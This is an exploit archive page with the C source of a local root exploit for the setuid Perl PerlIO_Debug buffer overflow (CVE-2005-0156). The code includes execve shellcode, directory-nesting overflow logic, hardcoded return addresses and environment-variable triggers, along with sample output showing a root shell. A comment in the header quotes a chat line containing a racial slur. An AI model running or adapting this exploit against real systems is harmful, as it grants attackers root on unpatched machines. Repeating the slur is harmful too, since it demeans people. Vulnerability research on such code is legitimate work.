exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ex_perl2b.c

ex_perl2b.c
Posted Feb 22, 2005
Authored by Kevin Finisterre | Site digitalmunition.com

Local root exploit for the PerlIO package that makes use of a buffer overflow in PERLIO_DEBUG.

tags | exploit, overflow, local, root
advisories | CVE-2005-0156
SHA-256 | 9d0552984b75d1eee91c3d55047ad2d3a217517c70c32a822a80f3f6ad4a4f98

ex_perl2b.c

Change Mirror Download
/*
* Copyright Kevin Finisterre
*
* Setuid perl PerlIO_Debug() overflow
*
* Tested on Debian 3.1 perl-suid 5.8.4-5
*
* (11:07:20) *corezion:* who is tha man with tha masta plan?
* (11:07:36) *corezion:* a nigga with a buffer overrun
* (11:07:39) *corezion:* heh
* (of course that is to the tune of http://www.azlyrics.com/lyrics/drdre/niggawittagun.html)
*
* cc -o ex_perl2 ex_perl2.c -std=c99
*
* kfinisterre@jdam:~$ ./ex_perl2
* Dirlen: 1052
* Charlie Murphy!!!@#@
* sh-2.05b# id
* uid=1000(kfinisterre) gid=1000(kfinisterre) euid=0(root)
*
*/

#include <stdlib.h>
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

int main(int *argc, char **argv)
{
int len = 23;
int count = 5;
char malpath[10000];
char tmp[256];
char *filler;
char *ptr;

unsigned char code[] =
/*
0xff-less execve() /bin/sh by anathema <anathema@hack.co.za>
Linux/IA32 0xff-less execve() shellcode.
*/
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

// setuid(0) - fix for redhat based machines
"\x31\xdb" // xorl %ebx,%ebx
"\x8d\x43\x17" // leal 0x17(%ebx),%eax
"\xcd\x80" // int $0x80

"\x89\xe6" /* movl %esp, %esi */
"\x83\xc6\x30" /* addl $0x30, %esi */
"\xb8\x2e\x62\x69\x6e" /* movl $0x6e69622e, %eax */
"\x40" /* incl %eax */
"\x89\x06" /* movl %eax, (%esi) */
"\xb8\x2e\x73\x68\x21" /* movl $0x2168732e, %eax */
"\x40" /* incl %eax */
"\x89\x46\x04" /* movl %eax, 0x04(%esi) */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
"\x89\x76\x08" /* movl %esi, 0x08(%esi) */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */;


chdir("/tmp/");

// do one less char than usual for RedHat
filler = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/";

for (int x=0; x<4; x=x+1)
{
mkdir(filler, 0777);
chdir(filler);
// do one less char than usual for RedHat
count = count + 255;
}

memset(tmp,0x41,len);
count = count + len;

ptr = tmp+len;
ptr = putLong (ptr, 0xbffffb6a); // frame 11 ebp
ptr = putLong (ptr, 0xbffffb6a);
ptr = putLong (ptr, 0xbffffb6a);

strcat(tmp, "/");
mkdir(tmp, 0777);
chdir(tmp);

printf ("Dirlen: %d\n", count);

FILE *perlsploit;
char perldummyfile[] = {
"#!/usr/bin/sperl5.8.4\n"
"# \n"
"# Be proud that perl(1) may proclaim: \n"
"# Setuid Perl scripts are safer than C programs ...\n"
"# Do not abandon (deprecate) suidperl. Do not advocate C wrappers. \n"
};

if(!(perlsploit = fopen("take_me.pl","w+"))) {
printf("error opening file\n");
exit(1);
}
fwrite(perldummyfile,sizeof(perldummyfile)-1,1,perlsploit);
fclose(perlsploit);

getcwd(malpath, 10000);
strcat(malpath, "/");
strcat(malpath, "take_me.pl");
printf("Charlie Murphy!!!@#@\n");

chmod(malpath,0755);
setenv("PERLIO_DEBUG", "/tmp/ninjitsu", 1);
setenv("PERL5LIB", code, 1);
execv(malpath,(char *) NULL);

}
/*
* put a address in mem, for little-endian
*
*/
char*
putLong (char* ptr, long value)
{
*ptr++ = (char) (value >> 0) & 0xff;
*ptr++ = (char) (value >> 8) & 0xff;
*ptr++ = (char) (value >> 16) & 0xff;
*ptr++ = (char) (value >> 24) & 0xff;

return ptr;
}



Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close